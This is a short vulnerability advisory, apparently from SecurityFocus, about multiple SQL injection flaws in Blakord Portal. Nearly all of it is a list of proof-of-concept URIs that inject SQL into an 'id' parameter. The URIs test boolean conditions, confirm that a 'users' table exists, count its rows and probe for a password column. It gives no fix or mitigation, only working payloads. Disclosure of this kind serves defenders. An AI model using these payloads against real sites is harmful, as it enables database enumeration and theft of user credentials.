Blakord Portal Multiple SQL Injection Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from [TABLE])
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from users)
http://www.example.com/[path]/[any module]?id=1 and 1=1
http://www.example.com/[path]/[any module]?id=1 and 1=2
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0


 

Privacy Statement
Copyright 2010, SecurityFocus